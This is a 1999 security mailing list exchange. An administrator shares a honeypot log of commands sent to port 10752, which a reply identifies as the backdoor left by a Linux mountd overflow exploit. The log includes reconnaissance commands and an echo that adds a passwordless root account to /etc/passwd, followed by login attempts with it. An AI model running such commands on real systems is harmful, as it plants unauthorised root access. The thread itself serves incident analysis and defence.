Firewall Wizards mailing list archives
RE: Port 10752?
From: "Frank W. Keeney" <FKeeney () hsa com>
Date: Wed, 24 Mar 1999 08:27:10 -0800
Thank you. I run the Deception Toolkit on one of my hosts to make it appear vulnerable to mountd exploits. I started seeing attempts at 10752 so I created a port 10752 deception. A few days ago I logged this: Hostname and ip addresses removed for obvious reasons: Commands to port 10752: S0 Init S0 trap '' SIGALRM SIGTRAP S0 PATH=/usr/local/bin:/bin:/usr/bin:/sbin:/usr/sbin;export PATH S0 /usr/sbin/rpc.mountd </dev/null S0 /bin/uname -a;/usr/bin/id;echo 'moof::0:0::/:/bin/bash'
/etc/passwd
Attempts to telnet using moof username: S0 S0 moof S0 mooof S0 moof S0 moof S0 moof S0 moof S0 moof S0 moof Another try: S0 Init S0 trap '' SIGALRM SIGTRAP S0 PATH=/usr/local/bin:/bin:/usr/bin:/sbin:/usr/sbin;export PATH S0 /usr/sbin/rpc.mountd </dev/null S0 /bin/uname -a;/usr/bin/id;echo 'moof::0:0::/:/bin/bash'
/etc/passwd
S0 ChildSignal ALRM More attempts to telnet using moof username: S0 S0 moof ---------- From: Vern Paxson [SMTP:vern () ee lbl gov] Sent: Tuesday, March 23, 1999 8:28 PM To: Frank W. Keeney Cc: firewall-wizards () nfr net Subject: Re: Port 10752? > What is Port 10752? > > I've been scanned several times from different locations for this port > number. It's a backdoor. In particular, that's the port that one of the Linux mountd overflow exploits runs its backdoor on if it succeeds.
Current thread:
- Port 10752? Frank W. Keeney (Mar 23)
- Re: Port 10752? Darren Reed (Mar 24)
- <Possible follow-ups>
- Re: Port 10752? Vern Paxson (Mar 24)
- RE: Port 10752? Frank W. Keeney (Mar 24)